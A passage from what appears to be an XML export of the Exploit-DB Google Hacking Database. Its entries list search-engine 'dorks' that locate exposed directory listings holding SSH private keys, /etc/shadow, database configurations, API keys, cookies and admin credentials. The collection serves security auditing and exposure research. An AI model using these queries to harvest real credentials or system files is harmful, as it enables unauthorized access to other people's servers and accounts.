# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; /.ssh/id_rsa OR id_rsa.pub</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /.ssh/id_rsa OR id_rsa.pub</querystring>
<edb></edb>
<date>2020-04-29</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6332</id>
<link>https://www.exploit-db.com/ghdb/6332</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; /etc/openvpn/</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; /etc/openvpn/
# Juicy information and sensitive directories.
# Date: 26/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; /etc/openvpn/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /etc/openvpn/</querystring>
<edb></edb>
<date>2020-06-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8100</id>
<link>https://www.exploit-db.com/ghdb/8100</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; /etc/shadow</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; /etc/shadow
# Files Containing Juicy Info
# Date:07/03/2023
# Exploit Author: Husain Saleem</textualDescription>
<query>intitle:&quot;index of&quot; /etc/shadow</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /etc/shadow</querystring>
<edb></edb>
<date>2023-03-07</date>
<author>Husain Saleem</author>
</entry>
<entry>
<id>7954</id>
<link>https://www.exploit-db.com/ghdb/7954</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; /gscloud</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; /gscloud
# Files Containing Juicy Info
# Date:24/06/2022
# Exploit Author: Christian Galvan</textualDescription>
<query>intitle:&quot;index of&quot; /gscloud</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /gscloud</querystring>
<edb></edb>
<date>2022-06-24</date>
<author>Christian Galvan</author>
</entry>
<entry>
<id>5976</id>
<link>https://www.exploit-db.com/ghdb/5976</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; /insecure_private_key</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; /insecure_private_key
# RSA private keys.
# Date: 30/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; /insecure_private_key</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /insecure_private_key</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5964</id>
<link>https://www.exploit-db.com/ghdb/5964</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; /known_hosts</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; /known_hosts
# List of pubkeys of known SSH servers.
# Date: 29/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; /known_hosts</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; /known_hosts</querystring>
<edb></edb>
<date>2020-04-29</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7715</id>
<link>https://www.exploit-db.com/ghdb/7715</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; :mobile number</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; :mobile number
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Renuka Kharat</textualDescription>
<query>intitle:&quot;index of&quot; :mobile number</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; :mobile number</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Renuka Kharat</author>
</entry>
<entry>
<id>5779</id>
<link>https://www.exploit-db.com/ghdb/5779</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; accounts.xml</shortDescription>
<textualDescription>pages containing juicy info:
intitle:&quot;index of&quot; accounts.xml
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; accounts.xml</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; accounts.xml</querystring>
<edb></edb>
<date>2020-03-09</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6277</id>
<link>https://www.exploit-db.com/ghdb/6277</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; admin.tar</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; admin.tar
Description: This google dorks lists out default admin folders on web
servers
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; admin.tar</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; admin.tar</querystring>
<edb></edb>
<date>2020-06-12</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5985</id>
<link>https://www.exploit-db.com/ghdb/5985</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; admin.txt</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; admin.txt
Description: This Google dork lists out admin login credentials stored in a
file named &quot;admin.txt&quot; for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; admin.txt</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; admin.txt</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5961</id>
<link>https://www.exploit-db.com/ghdb/5961</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; apache.log</shortDescription>
<textualDescription>Dork: intitle: &quot;index of&quot; apache.log
Description: This Google dork shows juicy information about the website and
finds out publicly available *apache logs* that contain sensitive
information &amp; can be exploited by the hacker.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; apache.log</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; apache.log</querystring>
<edb></edb>
<date>2020-04-29</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5984</id>
<link>https://www.exploit-db.com/ghdb/5984</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; apis.json</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; apis.json
Description: This Google dork lists out sensitive api credentials and
parameters for apis running on a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; apis.json</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; apis.json</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7951</id>
<link>https://www.exploit-db.com/ghdb/7951</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; aws/</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; aws/
# Files Containing Juicy Info
# Date: 6/22/2022
# Exploit Author: Christian Galvan
</textualDescription>
<query>intitle:&quot;index of&quot; aws/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; aws/</querystring>
<edb></edb>
<date>2022-06-23</date>
<author>Christian Galvan</author>
</entry>
<entry>
<id>376</id>
<link>https://www.exploit-db.com/ghdb/376</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index Of&quot; cookies.txt size</shortDescription>
<textualDescription>searches for cookies.txt file. On MANY servers this file holds all cookie information, which may include usernames, passwords, but also gives an attacker some juicy information on this users surfing habits.</textualDescription>
<query>intitle:&quot;Index Of&quot; cookies.txt &quot;size&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Index+Of%22+cookies.txt+%22size%22</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>5708</id>
<link>https://www.exploit-db.com/ghdb/5708</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; crontab.conf</shortDescription>
<textualDescription>Dork leading to a lot of juicy info
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; crontab.conf</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; crontab.conf</querystring>
<edb></edb>
<date>2020-01-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5869</id>
<link>https://www.exploit-db.com/ghdb/5869</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; cvsweb.conf</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; cvsweb.conf
# By using this dork, cvsweb configuration files with juicy information and
sometimes with exposed passwords can be found.
# Date: 31/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; cvsweb.conf</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; cvsweb.conf</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5801</id>
<link>https://www.exploit-db.com/ghdb/5801</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; database.yml</shortDescription>
<textualDescription># Google Dork:
intitle:&quot;index of&quot; database.yml
intitle:&quot;index of&quot; database.yml.ci
intitle:&quot;index of&quot; &quot;database-old.yml&quot;
# By using this dork, sensitive directories and databases' username and
password can be found.
# Date: 17/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; database.yml</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; database.yml</querystring>
<edb></edb>
<date>2020-03-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5983</id>
<link>https://www.exploit-db.com/ghdb/5983</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; dataSources.local.xml</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; dataSources.local.xml
Description: This Google dork lists out sensitive local database
configuration parameters for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; dataSources.local.xml</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; dataSources.local.xml</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5950</id>
<link>https://www.exploit-db.com/ghdb/5950</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; db.inc</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; db.inc
# Configuration files containing some times database usernames and
passwords.
# Date: 27/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Index of&quot; db.inc</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; db.inc</querystring>
<edb></edb>
<date>2020-04-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5966</id>
<link>https://www.exploit-db.com/ghdb/5966</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; db.json</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; db.json
Description: This Google dork lists out sensitive .json database files for
websites
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; db.json</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; db.json</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5949</id>
<link>https://www.exploit-db.com/ghdb/5949</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; db_mysql.inc</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; db_mysql.inc
# Configuration files containing some times database usernames and
passwords.
# Date: 27/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Index of&quot; db_mysql.inc</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; db_mysql.inc</querystring>
<edb></edb>
<date>2020-04-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5907</id>
<link>https://www.exploit-db.com/ghdb/5907</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; default.rdp</shortDescription>
<textualDescription>Description: intitle:&quot;index of&quot; default.rdp
This google dork gives us the Remote Desktop Protocol Connection
Information.
RDP contains juicy information about settings and credentials of windows
computer.
</textualDescription>
<query>intitle:&quot;index of&quot; default.rdp</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; default.rdp</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Siddhesh Thakur</author>
</entry>
<entry>
<id>4701</id>
<link>https://www.exploit-db.com/ghdb/4701</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; docker-compose.yml</shortDescription>
<textualDescription>File contains juicy info about docker containers, like DB configurations
and more.
Bruno Schmid
</textualDescription>
<query>intitle:&quot;index of&quot; docker-compose.yml</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; docker-compose.yml</querystring>
<edb></edb>
<date>2018-03-20</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>8318</id>
<link>https://www.exploit-db.com/ghdb/8318</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; ec2 -aws</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; ec2 -aws
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Esteban Brenes Segura</textualDescription>
<query>intitle:&quot;index of&quot; ec2 -aws</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; ec2 -aws</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Esteban Brenes Segura</author>
</entry>
<entry>
<id>5917</id>
<link>https://www.exploit-db.com/ghdb/5917</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; errorlog.txt</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; errorlog.txt
# Juicy information, and sometimes usernames and passwords can be found.
# Date: 17/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; errorlog.txt</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; errorlog.txt</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6390</id>
<link>https://www.exploit-db.com/ghdb/6390</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; exception.log</shortDescription>
<textualDescription>Description : intitle:&quot;index of&quot; system.log
The Google dork of intitle:&quot;index of&quot; system.log gives juicy information of
htdocs present in the respective url.
</textualDescription>
<query>intitle:&quot;index of&quot; exception.log</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; exception.log</querystring>
<edb></edb>
<date>2020-07-10</date>
<author>Sai Prashanth Pulisetti</author>
</entry>
<entry>
<id>7859</id>
<link>https://www.exploit-db.com/ghdb/7859</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; facebook-api</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; facebook-api
# Files Containing Juicy Info
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; facebook-api</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; facebook-api</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7884</id>
<link>https://www.exploit-db.com/ghdb/7884</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; filetype:sql</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; filetype:sql
# Files Containing Juicy Info
# Date: 15/12/2021
# Exploit Author: Ract Hack</textualDescription>
<query>intitle:&quot;index of&quot; filetype:sql</query>
<querystring>https://www.google.com/search?q=Re: intitle:&quot;index of&quot; filetype:sql</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Ract Hack</author>
</entry>
<entry>
<id>8191</id>
<link>https://www.exploit-db.com/ghdb/8191</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; github-api</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; github-api
# Files Containing Juicy Info
# Date:26/05/2023
# Exploit Author: Midhya Mathew</textualDescription>
<query>intitle:&quot;index of&quot; github-api</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; github-api</querystring>
<edb></edb>
<date>2023-05-26</date>
<author>Midhya Mathew</author>
</entry>
<entry>
<id>7854</id>
<link>https://www.exploit-db.com/ghdb/7854</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; google-api-php-client</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; google-api-php-client
# Files Containing Juicy Info
# Date:02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; google-api-php-client</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; google-api-php-client</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>8192</id>
<link>https://www.exploit-db.com/ghdb/8192</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; google-maps-api</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; google-maps-api
# Files Containing Juicy Info
# Date:26/05/2023
# Exploit Author: Midhya Mathew
</textualDescription>
<query>intitle:&quot;index of&quot; google-maps-api</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; google-maps-api</querystring>
<edb></edb>
<date>2023-05-26</date>
<author>Midhya Mathew</author>
</entry>
<entry>
<id>8319</id>
<link>https://www.exploit-db.com/ghdb/8319</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; graphql-api</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; graphql-api
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Esteban Brenes Segura</textualDescription>
<query>intitle:&quot;index of&quot; graphql-api</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; graphql-api</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Esteban Brenes Segura</author>
</entry>
<entry>
<id>7672</id>
<link>https://www.exploit-db.com/ghdb/7672</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; Hindi movies</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; Hindi movies
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;index of&quot; Hindi movies</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; Hindi movies</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>5104</id>
<link>https://www.exploit-db.com/ghdb/5104</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; hosts.csv | firewalls.csv | linux.csv | windows.csv</shortDescription>
<textualDescription>Juicy info
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; hosts.csv | firewalls.csv | linux.csv | windows.csv</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; hosts.csv | firewalls.csv | linux.csv | windows.csv</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7953</id>
<link>https://www.exploit-db.com/ghdb/7953</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; include/</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; include/
# Files Containing Juicy Info
# Date: 6/24/2022
# Exploit Author: Rejul Raghu
</textualDescription>
<query>intitle:&quot;index of&quot; include/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; include/</querystring>
<edb></edb>
<date>2022-06-24</date>
<author>Rejul Raghu</author>
</entry>
<entry>
<id>7860</id>
<link>https://www.exploit-db.com/ghdb/7860</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; instagram-api</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; instagram-api
# Files Containing Juicy Info
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; instagram-api</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; instagram-api</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>8257</id>
<link>https://www.exploit-db.com/ghdb/8257</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext: &quot;login.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; intext: &quot;login.php&quot;
# Files Containing Juicy Info
# Date: 16/10/2023
# Exploit Avdhut Hadkar</textualDescription>
<query>intitle:&quot;index of&quot; intext: &quot;login.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext: &quot;login.php&quot;</querystring>
<edb></edb>
<date>2023-10-16</date>
<author>Avdhut Hadkar</author>
</entry>
<entry>
<id>8071</id>
<link>https://www.exploit-db.com/ghdb/8071</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;Apache/1.4&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; intext:&quot;Apache/1.4&quot;
# Files Containing Juicy Info
# Date:21/02/2023
# Exploit Author: Ismail Tasdelen</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;Apache/1.4&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;Apache/1.4&quot;</querystring>
<edb></edb>
<date>2023-02-21</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>8017</id>
<link>https://www.exploit-db.com/ghdb/8017</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;Apache/2.2.3&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; intext:&quot;Apache/2.2.3&quot;
# Files Containing Juicy Info
# Date:16/08/2022
# Exploit Author: Wagner Emmanoel de Farias</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;Apache/2.2.3&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;Apache/2.2.3&quot;</querystring>
<edb></edb>
<date>2022-08-16</date>
<author>Wagner Emmanoel de Farias</author>
</entry>
<entry>
<id>8035</id>
<link>https://www.exploit-db.com/ghdb/8035</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;Apache/2.2.3&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; intext:&quot;Apache/2.2.3&quot;
# Files Containing Juicy Info
# Date:19/09/2022
# Exploit Author: Wagner Farias</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;Apache/2.2.3&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;Apache/2.2.3&quot;</querystring>
<edb></edb>
<date>2022-09-19</date>
<author>Wagner Farias</author>
</entry>
<entry>
<id>6749</id>
<link>https://www.exploit-db.com/ghdb/6749</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;apikey.txt</shortDescription>
<textualDescription>#Google Dork intitle:&quot;index of&quot; intext:&quot;apikey.txt&quot;
#Files Containing Juicy info
#Author Mohammed Saneem
</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;apikey.txt</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;apikey.txt</querystring>
<edb></edb>
<date>2021-01-07</date>
<author>Mohammed Saneem</author>
</entry>
<entry>
<id>4709</id>
<link>https://www.exploit-db.com/ghdb/4709</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;pip-selfcheck.json&quot;</shortDescription>
<textualDescription>Description :
Python virtual environment indexes.
Dork : intitle:&quot;index of&quot; intext:&quot;pip-selfcheck.json&quot;
Author:
Vipin Joshi ( @vocuzi )
</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;pip-selfcheck.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;pip-selfcheck.json&quot;</querystring>
<edb></edb>
<date>2018-03-26</date>
<author>vocuzi</author>
</entry>
<entry>
<id>8323</id>
<link>https://www.exploit-db.com/ghdb/8323</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; intext:&quot;Plone&quot; AND (&quot;migration.log&quot; OR &quot;error_log&quot; OR &quot;error.log&quot; OR &quot;z2.log&quot; OR &quot;debug.log&quot; OR &quot;Unauthorized.png&quot; OR &quot;error&quot; OR &quot;passwd&quot; OR &quot;htpasswd&quot; OR &quot;.gitignore&quot; OR &quot;debug&quot;)</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; intext:&quot;Plone&quot; AND (&quot;migration.log&quot; OR &quot;error_log&quot; OR &quot;error.log&quot; OR &quot;z2.log&quot; OR &quot;debug.log&quot; OR &quot;Unauthorized.png&quot; OR &quot;error&quot; OR &quot;passwd&quot; OR &quot;htpasswd&quot; OR &quot;.gitignore&quot; OR &quot;debug&quot;)
# Files Containing Juicy Info
# Date: 06/11/2023
# Exploit: Nayab Keshodwala</textualDescription>
<query>Plone installation files</query>
<querystring>https://www.google.com/search?q=Plone installation files</querystring>
<edb></edb>
<date>2023-11-06</date>
<author>Nayab Keshodwala</author>
</entry>
<entry>
<id>6963</id>
<link>https://www.exploit-db.com/ghdb/6963</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;senha&quot;</shortDescription>
<textualDescription># Exploit Title: Files Containing Juicy Info
# Google Dork: intitle:&quot;index of&quot; intext:&quot;senha&quot;
# Date: 2021-05-21
# Exploit Author: Aniket Prabhakar
</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;senha&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;senha&quot;</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>Aniket Prabhakar</author>
</entry>
<entry>
<id>6694</id>
<link>https://www.exploit-db.com/ghdb/6694</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:&quot;web.xml&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;index of&quot; intext:&quot;web.xml&quot;
# This dork looks for a directory listing that contains web.xml. The file is a deployment descriptor that defines mappings between URLs and servlets.
# For more information on web.xml:
# https://docs.oracle.com/cd/E24329_01/web.1211/e21049/web_xml.htm#WBAPP502
# It can be leveraged to identify additional pages/URIs on a webserver. A use case for example is on Apache Tomcat.
Category: Files Containing Juicy Info
Submitted by stmxcsr
</textualDescription>
<query>intitle:&quot;index of&quot; intext:&quot;web.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:&quot;web.xml&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>stmxcsr</author>
</entry>
<entry>
<id>6662</id>
<link>https://www.exploit-db.com/ghdb/6662</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:credentials</shortDescription>
<textualDescription>#Google Dork: intitle:&quot;index of&quot; intext:credentials
#Files Containing Juicy Info
#Author: Mohammed Saneem
</textualDescription>
<query>intitle:&quot;index of&quot; intext:credentials</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:credentials</querystring>
<edb></edb>
<date>2020-11-11</date>
<author>Mohammed Saneem</author>
</entry>
<entry>
<id>5577</id>
<link>https://www.exploit-db.com/ghdb/5577</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index Of&quot; intext:sftp-config.json</shortDescription>
<textualDescription>intitle:&quot;Index Of&quot; intext:sftp-config.json
--
Maxime Westhoven
</textualDescription>
<query>intitle:&quot;Index Of&quot; intext:sftp-config.json</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index Of&quot; intext:sftp-config.json</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Maxime Westhoven</author>
</entry>
<entry>
<id>4953</id>
<link>https://www.exploit-db.com/ghdb/4953</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:twr.html</shortDescription>
<textualDescription>intitle:&quot;index of&quot; intext:twr.html
This Google Dork discovers badly configured servers exposing sensitive
Tripwire reports.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>intitle:&quot;index of&quot; intext:twr.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:twr.html</querystring>
<edb></edb>
<date>2018-09-14</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>8087</id>
<link>https://www.exploit-db.com/ghdb/8087</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; intext:user inurl:data</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; intext:user inurl:data
# Files Containing Juicy Info
# Date:27/02/2023
# Exploit Author: Echo Programs</textualDescription>
<query>intitle:&quot;index of&quot; intext:user inurl:data</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; intext:user inurl:data</querystring>
<edb></edb>
<date>2023-02-27</date>
<author>Echo Programs</author>
</entry>
<entry>
<id>4712</id>
<link>https://www.exploit-db.com/ghdb/4712</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; inurl:&quot;paypal&quot; log</shortDescription>
<textualDescription>Juicy info regarding PayPal accounts, Server configurations related to
PayPal payments and other sensitive files related to it.
